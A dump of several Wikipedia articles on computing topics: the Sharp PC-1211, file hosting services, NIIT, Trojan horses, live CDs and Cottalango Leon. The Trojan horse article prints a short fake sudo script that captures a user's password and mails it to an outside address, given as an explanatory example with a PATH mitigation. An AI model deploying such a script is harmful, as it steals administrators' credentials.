https://en.wikipedia.org/wiki/Sharp%20PC-1211
Sharp PC-1211
The Sharp PC-1211 is a pocket computer marketed by Sharp Corporation in the 1980s. The computer was powered by two 4-bit CPUs laid out in power-saving CMOS circuitry. One acted as the main CPU, the other dealt with the input/output and display interface. Users could write computer programs in BASIC. A badge-engineered version of the PC-1211 was marketed by Radio Shack as the first iteration of the TRS-80 Pocket Computer. Technical specifications 24 digit dot matrix LCD Full QWERTY-style keyboard Integrated beeper Connector for printer and tape drive Programmable in BASIC Uses four MR44 1.35 V Mercury button cells Battery life in excess of 200 hours 1424 program steps, 26 permanent variable locations (A-Z or A$-Z$) and 178 variables shared with program steps Built out of off-the-shelf CMOS components, including SC43177/SC43178 processors at 256 kHz and three TC5514P 4 Kbit RAM modules Accessories CE-121 Cassette Interface CE-122 Printer TRS-80 Pocket Computer ("PC-1") A badge-engineered version of the Sharp PC-1211 was marketed by Radio Shack as the original TRS-80 Pocket Computer. (This was later referred to as the "PC-1" to differentiate it from subsequent entries (PC-2 onwards) in the TRS-80 Pocket Computer line.) Introduced in July 1980, the "PC-1" measured 175 × 70 × 15 mm and weighed 170 g, and had a one-line, 24-character alphanumeric LCD. The TRS-80 Pocket Computer was programmable in BASIC, with a capacity of 1424 "program steps". This memory was shared with variable storage of up to 178 locations, in addition to the 26 fixed locations named A through Z. The implementation was based on Palo Alto Tiny BASIC. Programs and data could be stored on a Compact Cassette through an optional external cassette tape interface unit. A printer/cassette interface was available, which used an ink ribbon on plain paper. See also Sharp pocket computer character sets References External links Sharp PC-1211 on MyCalcDB (database about 1970s and 1980s pocket calculators) www.promsoft.com/calcs Sharp Pocket Computers Daves Old Computers - TRS-80 Pocket Computer The TRS-80 Pocket Computer PC-1211 PC-1211 Computer-related introductions in 1980
1693035
https://en.wikipedia.org/wiki/File%20hosting%20service
File hosting service
A file hosting service, cloud storage service, online file storage provider, or cyberlocker is an internet hosting service specifically designed to host user files. It allows users to upload files that could be accessed over the internet after a user name and password or other authentication is provided. Typically, the services allow HTTP access, and sometimes FTP access. Related services are content-displaying hosting services (i.e. video and image), virtual storage, and remote backup. Uses Personal file storage Personal file storage services are aimed at private individuals, offering a sort of "network storage" for personal backup, file access, or file distribution. Users can upload their files and share them publicly or keep them password-protected. Document-sharing services allow users to share and collaborate on document files. These services originally targeted files such as PDFs, word processor documents, and spreadsheets. However many remote file storage services are now aimed at allowing users to share and synchronize all types of files across all the devices they use. File sync and sharing services File syncing and sharing services are file hosting services which allow users to create special folders on each of their computers or mobile devices, which the service then synchronizes so that it appears to be the same folder regardless of which computer is used to view it. Files placed in this folder also are typically accessible through a website and mobile apps, and can be easily shared with other users for viewing or collaboration. Such services have become popular via consumer products such as Dropbox and Google Drive. Content caching Content providers who potentially encounter bandwidth congestion issues may use services specialized in distributing cached or static content. It is the case for companies with a major Internet presence. Storage charges Some online file storage services offer space on a per-gigabyte basis, and sometimes include a bandwidth cost component as well. Usually these will be charged monthly or yearly. Some companies offer the service for free, relying on advertising revenue. Some hosting services do not place any limit on how much space the user's account can consume. Some services require a software download which makes files only available on computers which have that software installed, others allow users to retrieve files through any web browser. With the increased inbox space offered by webmail services, many users have started using their webmail service as an online drive. Some sites offer free unlimited file storage but have a limit on the file size. Some sites offer additional online storage capacity in exchange for new customer referrals. One-click hosting One-click hosting, sometimes referred to as cyberlocker, generally describes web services that allow internet users to easily upload one or more files from their hard drives (or from a remote location) onto the one-click host's server free of charge. Most such services simply return a URL which can be given to other people, who can then fetch the file later. In many cases these URLs are predictable allowing potential misuse of the service. these sites have drastically increased in popularity, and subsequently, many of the smaller, less efficient sites have failed. Although one-click hosting can be used for many purposes, this type of file sharing has, to a degree, come to compete with P2P filesharing services. The sites make money through advertising or charging for premium services such as increased downloading capacity, removing any wait restrictions the site may have or prolonging how long uploaded files remain on the site. Premium services include facilities like unlimited downloading, no waiting, maximum download speed etc. Many such sites implement a CAPTCHA to prevent automated downloading. Several programs aid in downloading files from these one-click hosts; examples are JDownloader, FreeRapid, Mipony, Tucan Manager and CryptLoad. Use for copyright infringement File hosting services may be used as a means to distribute or share files without consent of the copyright owner. In such cases one individual uploads a file to a file hosting service, which others can then download. Legal assessments can be very diverse. For example, in the case of Swiss-German file hosting service RapidShare, in 2010 the US government's congressional international anti-piracy caucus declared the site a "notorious illegal site", claiming that the site was "overwhelmingly used for the global exchange of illegal movies, music and other copyrighted works". But in the legal case Atari Europe S.A.S.U. v. Rapidshare AG in Germany, the Düsseldorf higher regional court examined claims related to alleged infringing activity and reached the conclusion on appeal that "most people utilize RapidShare for legal use cases" and that to assume otherwise was equivalent to inviting "a general suspicion against shared hosting services and their users which is not justified". The court also observed that the site removes copyrighted material when asked, does not provide search facilities for illegal material, noted previous cases siding with RapidShare, and after analysis the court concluded that the plaintiff's proposals for more strictly preventing sharing of copyrighted material – submitted as examples of anti-piracy measures RapidShare might have adopted – were found to be "unreasonable or pointless". By contrast in January 2012 the United States Department of Justice seized and shut down the file hosting site Megaupload.com and commenced criminal cases against its owners and others. Their indictment concluded that Megaupload differed from other online file storage businesses, suggesting a number of design features of its operating model as being evidence showing a criminal intent and venture. Examples cited included reliance upon advertising revenue and other activities showing the business was funded by (and heavily promoted) downloads and not storage, defendants' communications helping users who sought infringing material, and defendants' communications discussing their own evasion and infringement issues. the case has not yet been heard. A year later, Megaupload.com relaunched as Mega. In 2016 the file hosting site Putlocker has been noted by the Motion Picture Association of America for being a major piracy threat, and in 2012 Alfred Perry of Paramount Pictures listed Putlocker as one of the "top 5 rogue cyberlocker services", alongside Wupload, FileServe, Depositfiles, and MediaFire. Security The emergence of cloud storage services has prompted much discussion on security. Security, as it relates to cloud storage can be broken down into: Access and integrity security Deals with the question of confidentiality and availability : Will the user be able to continue accessing their data? Who else can access it? Who can change it? Whether the user is able to continue accessing their data depends on a large number of factors, ranging from the location and quality of their internet connection and the physical integrity of the provider's data center to the financial stability of the storage provider. The question of who can access and, potentially, change their data ranges from what physical access controls are in place in the provider's data center to what technical steps have been taken, such as access control, encryption, etc. Many cloud storage services state that they either encrypt data before it is uploaded or while it is stored. While encryption is generally regarded as best practice in cloud storage how the encryption is implemented is very important. Consumer-grade, public file hosting and synchronization services are popular, but for business use, they create the concern that corporate information is exported to devices and cloud services that are not controlled by the organization. Some cloud storage providers offer granular ACLs for application keys. One important permission is append-only, which is distinct from simple "read", "write", and "read-write" permissions in that all existing data is immutable. Append-only support is especially important to mitigate the risk of data loss for backup policies in the event that the computer being backed-up becomes infected with ransomware capable of deleting or encrypting the victim's backups. Data encryption Secret key encryption is sometimes referred to as zero knowledge, meaning that only the user has the encryption key needed to decrypt the data. Since data is encrypted using the secret key, identical files encrypted with different keys will be different. To be truly zero knowledge, the file hosting service must not be able to store the user's passwords or see their data even with physical access to the servers. For this reason, secret key encryption is considered the highest level of access security in cloud storage. This form of encryption is rapidly gaining popularity, with companies such as MEGA (previously Megaupload) and SpiderOak being entirely zero knowledge file storage and sharing. Since secret key encryption results in unique files, it makes data deduplication impossible and therefore may use more storage space. Convergent encryption derives the key from the file content itself and means an identical file encrypted on different computers result in identical encrypted files. This enables the cloud storage provider to de-duplicate data blocks, meaning only one instance of a unique file (such as a document, photo, music or movie file) is actually stored on the cloud servers but made accessible to all uploaders. A third party who gained access to the encrypted files could thus easily determine if a user has uploaded a particular file simply by encrypting it themselves and comparing the outputs. Some point out that there is a theoretical possibility that organizations such as the RIAA, MPAA, or a government could obtain a warrant for US law enforcement to access the cloud storage provider's servers and gain access to the encrypted files belonging to a user. By demonstrating to a court how applying the convergent encryption methodology to an unencrypted copyrighted file produces the same encrypted file as that possessed by the user would appear to make a strong case that the user is guilty of possessing the file in question and thus providing evidence of copyright infringement by the user. There is, however, no easily accessible public record of this having been tried in court as of May 2013 and an argument could be made that, similar to the opinion expressed by Attorney Rick G. Sanders of Aaron | Sanders PLLC in regards to the iTunes Match "Honeypot" discussion, that a warrant to search the cloud storage provider's servers would be hard to obtain without other, independent, evidence establishing probable cause for copyright infringement. Such legal restraint would obviously not apply to the secret police of an oppressive government who could potentially gain access to the encrypted files through various forms of hacking or other cybercrime. Ownership security See also Comparison of file hosting services Comparison of file synchronization software Comparison of online backup services Comparison of online music lockers File sharing List of backup software Shared disk access References File hosting Records management
21554169
https://en.wikipedia.org/wiki/NIIT
NIIT
NIIT Limited is an Indian multinational skills and talent development corporation headquartered in Gurgaon, India. The company was set up in 1981 to help the nascent IT industry overcome its human resource challenges. NIIT offers training and development to individuals, enterprises and institutions. History NIIT was established in 1981 by Rajendra S. Pawar and Vijay K. Thadani, graduates from IIT Delhi, with one million rupees. NIIT conceived a franchising model in IT education for the very first time, setting up nine centers by 1987. In 1986, NIIT began its foray into the software domain, beginning with Software Product Distribution under the 'Insoft' brand. The company also began offering advice and consultancy to large corporations on how to leverage technology and make optimum use of their IT investments. In 1988, NIIT introduced many marketing and advertising strategies for the Indian market including the 'Computerdrome' in 1990. Another initiative launched by NIIT, was its Bhavishya Jyoti Scholarships program, launched in 1991, which was targeted at deserving and socially challenged students with an aim to improve their skills and employability quotient. In 1992, NIIT launched its flagship program GNIIT, an industry-endorsed course with a 12-month Professional Practice for students seeking careers in the IT and non-IT sectors. By 1993, the NIIT stock began trading on Indian stock exchanges. In 1996, NIIT began its globalization journey, setting up an education center in Hong Kong. In the same year, the company launched its virtual university 'NetVarsity'. In 1998, NIIT joined a handful of Indian tech companies to enter the Chinese market. The company earned the epithet, the 'McDonald's of the software business' by Far Eastern Economic Review in September, 2001. The same year, NIIT launched an experiment that was christened 'Hole-in-the-Wall' by media and drew international attention. The experiment was based on the ‘minimally invasive education’ methodology developed by NIIT R&D. It suggested that children, irrespective of their social, ethnic, or educational identity could learn to use computers by themselves, without adult intervention. In 2003, NIIT launched its MindChampions Academy (MCA) with Viswanathan Anand, five-time former World Chess champion and NIIT Brand Ambassador. In 2004, NIIT sectioned off its software business into an independent organization called NIIT Technologies Ltd. (Source: NASSCOM's 2013–14 Ranking of Top 20 IT services companies). In the area of training, NIIT launched its 'Edgeineers' program in 2005, to boost career opportunities for engineering graduates. In 2006, it diversified into various new sectors for training, such as banking, finance and insurance (through IFBI), executive management education (through NIIT Imperia brand), Professional Life Skills training and business process management training (through Evolv and NIIT Uniqua). In 2009, NIIT University (NU), a not-for-profit University was established, under section 2(f) of UGC Act and notified by the Government of Rajasthan. In 2014, NIIT tied up with National Skill Development Corporation to launch NIIT Yuva Jyoti centers, under the pilot phase of Prime Minister Narendra Modi's Skill India campaign and the Pradhan Mantri Kaushal Vikas Yojana (PMKVY) in North East, J&K and Jharkhand. In May 2019, Baring Private Equity Asia had acquired controlling stake of NIIT Ltd in NIIT Technologies Ltd. Acquisitions In 2001, NIIT acquired Osprey, DEI and Click2learn in the US, to establish its e-learning and corporate learning practices in that country. In 2006, NIIT acquired Element K, a leading provider of learning solutions in North America. Subsequently, Element K was sold off in 2012. On October 1, 2021 NIIT announced the acquisition of a 70% stake acquisition in RPS Cpnsulting, a Bengaluru based training company. NIIT Subsidiaries NIIT (USA), Inc. NIIT Ireland Ltd NIIT Institute of Finance, Banking & Insurance Training Ltd. NIIT China (Shanghai) Limited NIIT Antilles NV NIIT Learning Solutions (Canada) Limited Learning Universe Private Limited NIIT Institute of Process Excellence Ltd. Timeline 1981: NIIT was established by Rajendra S. Pawar and Vijay K. Thadani to optimise on the opportunity of booming IT education and training in India 1982: Setup educational centres in Mumbai and Chennai; Introduced Multimedia technology in education 1983: Corporate training program introduced 1984: IT consultancy service started 1985: Head Office integrated at New Delhi 1986: Software product distribution started under "Insoft" brand 1987: Conceived Franchising Model of education 1990: Created the Computer drome to provide unlimited computer time to students 1991: First overseas office set up in US; "Bhavishya Jyoti Scholarships" launched for meritorious and socially challenged students 1992: GNIIT program started with professional practice 1993: Received ISO 9001 for software export; Listed on BSE 1995: NIIT tied up with Microsoft to provide education of Microsoft technologies 1996: First overseas education center launched; Launched "NetVarsity", the virtual University; Awarded ISO 9001 for Computer Education 1997: NIIT was the first Indian Company to be assessed at SEI CMM Level 5 for Software Business; Unique distinction puts NIIT into first list of 21st Global companies 1999: Achieved the status of Microsoft's best training partner in Asia; Five time World Champion Viswanathan Anand became NIIT Brand Ambassador; Started Hole-in-the-Wall (HiWEl) experiment for disadvantaged children. 2000: Tied up with Oracle Corporation to provide education on Oracle technologies specially on Oracle Database; Collaborated with Sun Microsystems on "iForce initiatives on computing giant" 2001: Microsoft awarded NIIT the "Best Training Company Award" 2003: Launched NIIT MindChampions Academy with Viswanathan Anand to promote chess in schools. 2004: Global Solutions Business spun off into NIIT Technologies; Industry endorsed GNIIT curriculum was launches; NIIT and Intel signed a deal to use technology-assisted learning in school 2005: Launch of NIIT IT Aptitude Test (NITAT) 2006: Launched new businesses called NIIT Litmus which provides testing & assessment services for IT&ITES organizations, NIIT Imperia which would provide three certificate programmes from Indian Institutes of Management and IFBI - Institute of Finance Banking and Insurance (NIIT IFBI) 2009: Founded and commenced new "NIIT University" campus in Neemrana, Rajasthan offering more post graduation level courses. 2011: Launch of NIIT Yuva Jyoti Limited (NYJL)- a joint venture between NIIT and NSDC to fuel growth in Skills & Employability for youth across India 2012: Launch of Digital Marketing Program; NIIT received 'Top IT Training Company Award 2012' for the 20th year in succession by Cybermedia publications. 2013: NIIT, NIIT University entered into a MoU with Autodesk to evangelize design as a learning discipline in India; NIIT launched 'Program in Business Analytics'; NIIT launches NIIT Cloud Campus: A pioneering initiative undertaken to help take high quality educational programs to the remotest corners of the country; NIIT enters Test Preparation Market with CTET Coaching 2014: NIIT launches its new persona based website www.niit.com 2015: Internet and Mobile Association of India (IAMAI) recognizes NIIT as the "Best Educational Website"; NIIT enters into MoU with Guian New Area, China 2016: Launch of Training.com to offer online training 2017: Sapnesh Lalla takes charge as the CEO of NIIT Ltd. In May 2019, Baring Private Equity Asia had acquired controlling stake of NIIT Ltd in NIIT Technologies Ltd. Business Units NIIT has two main lines of business across the globe – Corporate Learning Group and Skills & Careers Business. NIIT's Corporate Learning Group (CLG) offers Managed Training Services (MTS) to market-leading companies in North America, Europe, Asia, and Oceania. The Skills & Careers Business (SNC) delivers a diverse range of learning and talent development programs to millions of individual and corporate learners in areas including Digital Transformation, Banking, Finance & Insurance, Retail Sales Enablement, Digital Media Marketing, and new-age IT. NIIT has incubated, StackRoute, as a digital transformation partner for corporates to build multi-skilled full stack developers at scale. See also Education in India Information technology in India List of Indian IT companies Professional certification Professional certification (computer technology) References External links Education companies established in 1981 Companies based in Gurgaon Educational institutions established in 1981 For-profit universities and colleges 1981 establishments in Haryana Companies listed on the National Stock Exchange of India Companies listed on the Bombay Stock Exchange
30056
https://en.wikipedia.org/wiki/Trojan%20horse%20%28computing%29
Trojan horse (computing)
In computing, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans generally spread by some form of social engineering; for example, where a user is duped into executing an email attachment disguised to appear not suspicious (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer. Ransomware attacks are often carried out using a trojan. Unlike computer viruses, worms, and rogue security software, trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves. Use of the term It's not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both: Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software. He mentioned that he knew about the possible existence of trojans from a report on the security of Multics. Behavior Once installed, trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the trojan, using it as a proxy for malicious action. In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software. Examples of govware trojans include the Swiss MiniPanzer and MegaPanzer and the German "state trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a trojan infection. Linux example A Trojan horse is a program that purports to perform some obvious function, yet upon execution it compromises the user's security. One easy program is a new version of the Linux sudo command. The command is then copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory and executes sudo, then the Trojan horse might be executed. Here is a working version: : # sudo # ---- # Turn off the character echo to the screen. stty -echo /bin/echo -n "Password for `whoami`: " read x /bin/echo "" # Turn back on the character echo. stty echo echo $x | mail -s "`whoami` password" [email protected] sleep 1 echo Sorry. rm $0 exit 0 To prevent a command-line based Trojan horse, set the . entry in the PATH= environment variable to be located at the tail end. For example: PATH=/usr/local/bin:/usr/bin:.. Notable examples Private and governmental ANOM - FBI 0zapftis / r2d2 StaatsTrojaner – DigiTask DarkComet – CIA / NSA FinFisher – Lench IT solutions / Gamma International DaVinci / Galileo RCS – HackingTeam Magic Lantern – FBI SUNBURST – SVR/Cozy Bear (suspected) TAO QUANTUM/FOXACID – NSA WARRIOR PRIDE – GCHQ Publicly available EGABTR – late 1980s Netbus – 1998 (published) Sub7 by Mobman – 1999 (published) Back Orifice – 1998 (published) Y3K Remote Administration Tool by E&K Tselentis – 2000 (published) Beast – 2002 (published) Bifrost trojan – 2004 (published) DarkComet – 2008-2012 (published) Blackhole exploit kit – 2012 (published) Gh0st RAT – 2009 (published) MegaPanzer BundesTrojaner – 2009 (published) MEMZ by Leurak – 2016 (published) Detected by security researchers Twelve Tricks – 1990 Clickbot.A – 2006 (discovered) Zeus – 2007 (discovered) Flashback trojan – 2011 (discovered) ZeroAccess – 2011 (discovered) Koobface – 2008 (discovered) Vundo – 2009 (discovered) Meredrop – 2010 (discovered) Coreflood – 2010 (discovered) Tiny Banker Trojan – 2012 (discovered) Shedun Android malware – 2015 (discovered) Capitalization The computer term "trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use. See also Computer security Cuckoo's egg (metaphor) Cyber spying Dancing pigs Exploit (computer security) Industrial espionage Principle of least privilege Privacy-invasive software Remote administration Remote administration software Reverse connection Rogue security software Scammers Technical support scam Timeline of computer viruses and worms Zombie (computer science) References External links Social engineering (computer security) Spyware Web security exploits Cyberwarfare Security breaches
8111362
https://en.wikipedia.org/wiki/List%20of%20live%20CDs
List of live CDs
This is a list of live CDs. A live CD or live DVD is a CD-ROM or DVD-ROM containing a bootable computer operating system. Live CDs are unique in that they have the ability to run a complete, modern operating system on a computer lacking mutable secondary storage, such as a hard disk drive. Rescue and repair Billix – A multiboot distribution and system administration toolkit with the ability to install any of the included Linux distributions Inquisitor – Linux kernel-based hardware diagnostics, stress testing and benchmarking live CD Parted Magic – Entirely based on the 2.6 or newer Linux kernels System Folder of classic Mac OS on a CD or on a floppy disk – Works on any media readable by 68k or PowerPC Macintosh computers SystemRescueCD – A Linux kernel-based CD with tools for Windows and Linux repairs BSD-based FreeBSD based DesktopBSD – as of 1.6RC1 FreeBSD and FreeSBIE based FreeBSD – has supported use of a "fixit" CD for diagnostics since 1996 FreeNAS – m0n0wall-based FreeSBIE (discontinued) – FreeBSD-based GhostBSD – FreeBSD based with gnome GUI, installable to HDD Ging – Debian GNU/kFreeBSD-based m0n0wall (discontinued) – FreeBSD-based TrueOS – FreeBSD-based pfSense – m0n0wall-based Other BSDs DragonFly BSD Linux kernel-based Arch Linux based Artix – LXQt preconfigured and OpenRC-oriented live CD and distribution Archie – live CD version of Arch Linux. Antergos Chakra Manjaro – primarily free software operating system for personal computers aimed at ease of use. Parabola GNU/Linux-libre - distro endorsed by the Free Software Foundation SystemRescueCD Debian-based These are directly based on Debian: antiX – A light-weight edition based on Debian Debian Live – Official live CD version of Debian Finnix – A small system administration live CD, based on Debian testing, and available for x86 and PowerPC architectures grml – Installable live CD for sysadmins and text tool users HandyLinux – A French/English Linux distribution derived from Debian designed for inexperienced computer users Instant WebKiosk – Live, browser only operating system for use in web kiosks and digital signage deployments Kali Linux – The most advanced penetration testing distribution Knoppix – The "original" Debian-based live CD MX Linux – Live based on Debian stable Tails – An Amnesic OS based on anonymity and Tor Slax – (formerly based on Slackware) modular and very easy to remaster Webconverger – Kiosk software that boots live in order to turn PC into temporary Web kiosk Knoppix-based A large number of live CDs are based on Knoppix. The list of those is in the derivatives section of the Knoppix article. Ubuntu-based These are based at least partially on Ubuntu, which is based on Debian: CGAL LiveCD – Live CD containing CGAL with all demos compiled. This enables the user to get an impression of CGAL and create CGAL software without the need to install CGAL. Emmabuntüs is a Linux distribution derived from Ubuntu and designed to facilitate the repacking of computers donated to Emmaüs Communities. gNewSense – Supported by the Free Software Foundation, includes GNOME gOS – A series of lightweight operating systems based on Ubuntu with Ajax-based applications and other Web 2.0 applications, geared to beginning users, installable live CD Linux Mint – Installable live CD Mythbuntu – A self-contained media center suite based on Ubuntu and MythTV OpenGEU – Installable live CD PC/OS – An Ubuntu derivative whose interface was made to look like BeOS. a 64 bit version was released in May 2009. In 2010 PC/OS moved to a more unified look to its parent distribution and a GNOME version was released on March 3, 2010. Pinguy – An Ubuntu-based distribution designed to look and feel simple. Pinguy is designed with the intent of integrating new users to Linux. Puredyne – Live CD/DVD/USB for media artists and designers, based on Ubuntu and Debian Live Qimo 4 Kids – A fun distro for kids that comes with educational games Trisquel – Supported by the Free Software Foundation, includes GNOME TurnKey Linux Virtual Appliance Library – Family of installable live CD appliances optimized for ease of use in server-type usage scenarios Ubuntu and Lubuntu – Bootable live CDs Other Debian-based AVLinux – AVLinux is a Linux for multimedia content creators. CrunchBang Linux – Installable live CD, using Openbox as window manager Damn Small Linux – Very light and small with JWM and Fluxbox, installable live CD DemoLinux (versions 2 and 3) – One of the first live CDs Dreamlinux – Installable live CD to hard drives or flash media * This distribution has ceased support * gnuLinEx – Includes GNOME Kanotix – Installable live CD MEPIS – Installable live CD Gentoo-based Bitdefender Rescue CD Calculate Linux FireballISO – VMware virtual machine that generates a customized security-hardened IPv4 and IPv6 firewall live CD. Incognito – includes anonymity and security tools such as Tor by default Kaspersky Rescue Disk Pentoo SabayonLinux Ututo VidaLinux Mandriva-based DemoLinux (version 1) Mageia – installable live CD Mandriva Linux – installable live CD; GNOME and KDE editions available openSUSE-based openSuSE – official Novell/SuSE-GmbH version – installable live CD; GNOME and KDE versions available Red Hat Linux/Fedora-based Berry Linux CentOS – installable live CD Fedora – installable live CD, with GNOME or KDE Korora – installable live USB (recommended over DVD), with Cinnamon, GNOME, KDE, MATE, or Xfce Network Security Toolkit – installable live disc, with GNOME or Fluxbox Slackware-based AUSTRUMI – 50 MB Mini distro BioSLAX – a bioinformatics live CD with over 300 bioinformatics applications NimbleX – under 200 MB Porteus – under 300 MB Salix Slackware-live ( CD / USB images with latest update from slackware-current ) Vector Linux (Standard and SOHO Editions) Zenwalk Other Acronis Rescue Media – to make disk images from hard disk drives CHAOS – small (6 MB) and designed for creating ad hoc computer clusters EnGarde Secure Linux – a highly secure Linux based on SE Linux GeeXboX – a self-contained media center suite based on Linux and MPlayer GoboLinux – an alternative Linux distribution. Its most salient feature is its reorganization of the filesystem hierarchy. Under GoboLinux, each program has its own subdirectory tree. Granular – installable live CD based on PCLinuxOS, featuring KDE and Enlightenment Lightweight Portable Security – developed and publicly distributed by the United States Department of Defense’s Software Protection Initiative to serve as a secure end node Linux From Scratch Live CD (live CD inactive) – used as a starting point for a Linux From Scratch installation Nanolinux – 14 MB distro on an installable live CD with BusyBox and Fltk, for desktop computing paldo – independently developed, rolling release distribution on installable live CD PCLinuxOS – installable live CD for desktop computing use Puppy Linux – installable live CD, very small SliTaz – installable live CD, one of the smallest available with good feature set Tiny Core Linux – based on Linux 2.6 kernel, BusyBox, Tiny X, Fltk, and Flwm, begins at 10 MB XBMC Live – a self-contained media center suite based on Embedded Linux and XBMC Media Center OS X-based DasBoot by SubRosaSoft.com OSx86 (x86 only) Windows-based Microsoft representatives have described third-party efforts at producing Windows-based live CDs as "improperly licensed" uses of Windows, unless used solely to rescue a properly licensed installation. However, Nu2 Productions believes the use of BartPE is legal provided that one Windows license is purchased for each BartPE CD, and the Windows license is used for nothing else. BartPE – allows creation of a bootable CD from Windows XP and Windows Server 2003 installation files WinBuilder – allows the creation of a bootable CD from Windows 2000 and later Windows Preinstallation Environment OpenSolaris-based Systems based on the former open source "OS/net Nevada" or ONNV open source project by Sun Microsystems. BeleniX – full live CD and live USB distribution (moving to Illumos?) OpenSolaris – the former official distribution supported by Sun Microsystems based on ONNV and some closed source parts Illumos-based Illumos is a fork of the former OpenSolaris ONNV aiming to further develop the ONNV and replacing the closed source parts while remaining binary compatible. The following products are based upon Illumos: Nexenta OS – combines the GNU userland with the OpenSolaris kernel. OpenIndiana – since OpenIndiana 151a based on Illumos Other operating systems AmigaOS 4 – Installable live CD Arch Hurd – A live CD of Arch Linux with the GNU Hurd as its kernel AROS – Offers live CD for download on the project page BeOS – All BeOS discs can be run in live CD mode, although PowerPC versions need to be kickstarted from Mac OS 8 when run on Apple or clone hardware FreeDOS – the official "Full CD" 1.0 release includes a live CD portion Haiku – Haiku is a free and open source operating system compatible with BeOS running on Intel x86 platforms instead of PowerPC. Hiren's BootCD Minix MorphOS – Installable live CD OpenVMS – Installable live CD OS/2 Ecomstation Demo Plan 9 from Bell Labs – Has a live CD, which is also its install CD (and the installer is a shell script). QNX ReactOS SkyOS Syllable Desktop See also List of Linux distributions that run from RAM List of tools to create Live USB systems Windows To Go References External links The LiveCD List Live CDs Live CD
49360708
https://en.wikipedia.org/wiki/Cottalango%20Leon
Cottalango Leon
Cottalango Leon (born 1971) is an Indian-American computer graphics technician who won the Academy Award for scientific and technical achievement jointly with Sam Richards and J. Robert Ray in 2016. Leon won the Academy Award for "the design, engineering and continuous development" of Sony Pictures Imageworks itView technology, a digital 3D film review software. Leon worked on the itView technology for eight years as the chief contributor. Schooled in India, Leon is an Arizona State University alumnus. He has worked at Sony Pictures Imageworks since 1996, and has contributed to the making of several commercially successful films, including the Spider-Man (2002 film series)Spider-Man film series and the Men In Black film series. Early life and family Leon was born at his mother's family residence in Thoothukudi, Tamil Nadu in 1971. Both his parents – mother Rajam Mariasingam and father Loorthu – were primary school teachers. When Leon was young, his parents moved from the south of Tamil Nadu to Coimbatore. Leon's early years were spent in this city – a place he still visits every two years. Leon attended the Government High School at Kallapalayam, a village in the Sultanpet Block of Coimbatore. After studying here till grade VII, he studied from grade VIII to grade XII at Kadri Mills High School in Coimbatore. During his childhood, Leon became interested in the subjects of mathematics and science, and also developed, as per him, a keen interest in "the visual aspect of movies". Subsequently, Leon attended college at the PSG College of Technology from 1988 till 1992, completing his Bachelor of Engineering degree in computer science. He completed his M.S. in computer science from Arizona State University in 1996, specialising in computer graphics. Leon married Roopa in 2001. Roopa also belongs to southern Tamil Nadu, having lived there till her marriage to Leon. The couple have a daughter Shruthi and live in Culver City. Career After graduating, Leon joined the New Delhi firm Softek LLC and worked with them for two years till 1994. As per Leon, during this time, he became inspired by Jurassic Park after watching the film and decided to pursue his career in the technologies used in its making. After completing the master's degree at Arizona State University in 1996, Leon worked for a short time as a video game programmer with DreamWorks Interactive, before joining Sony Pictures Imageworks in 1996, where he continues working to date, currently holding the position of Principal Software Engineer. At Imageworks, as per Leon, he was asked to develop an improved digital film review software as an alternative to a then existing software. Leon released the initial version within two months of having been assigned the job; after receiving positive feedback from the artists using the software, Leon kept updating various functionalities of the software over the years. This digital 3D film review software, itView, led Leon to get an Academy Award in 2016. Leon mentions working alone on the project for many years, and that he was over time given a team when the project achieved significant growth. In a 2016 media interview, Leon says that he worked on the itView technology for eight years as the chief contributor. To date, Leon has worked on several commercially successful films, including Stuart Little, the Spider-Man (2002 film series)Spider-Man film series, the Men In Black film series, Cloudy with a Chance of Meatballs, The Smurfs, Hotel Transylvania, and Open Season. 2016 Academy Award Leon, at the age of 44, won the 2016 Academy Award for scientific and technical achievement for "the design, engineering and continuous development" of Sony Pictures Imageworks itView technology. In a ceremony held on 13 February 2016 at Beverly Wilshire Hotel in Beverly Hills, California, Leon received the Academy Award jointly with Sam Richards and J. Robert Ray. As per the Academy, these set of awards are bestowed upon individuals who have contributed significantly over time – and not necessarily in the past year – to the motion picture industry. Richard Edlund, Chair of the Scientific and Technical Awards Committee at the Academy of Motion Picture Arts and Sciences praised the "outstanding, innovative work" of awardees, adding that their contributions "have further expanded filmmakers’ creative opportunities..." The Academy's award citation praised itView's API plugin and varied functionalities, mentioning that "itView provides an intuitive and flexible creative review environment that can be deployed globally for highly efficient collaboration." Leon said that "the award was not totally unexpected" but that it felt "good to be recognised by the Academy and the wider industry." See also List of Indian winners and nominees of the Academy Awards Notes References External links Indian Academy Award winners Living people Academy Award for Technical Achievement winners People from Coimbatore People from Thoothukudi 1971 births Arizona State University alumni Indian emigrants to the United States
32220899
https://en.wikipedia.org/wiki/David%20Harley
David Harley
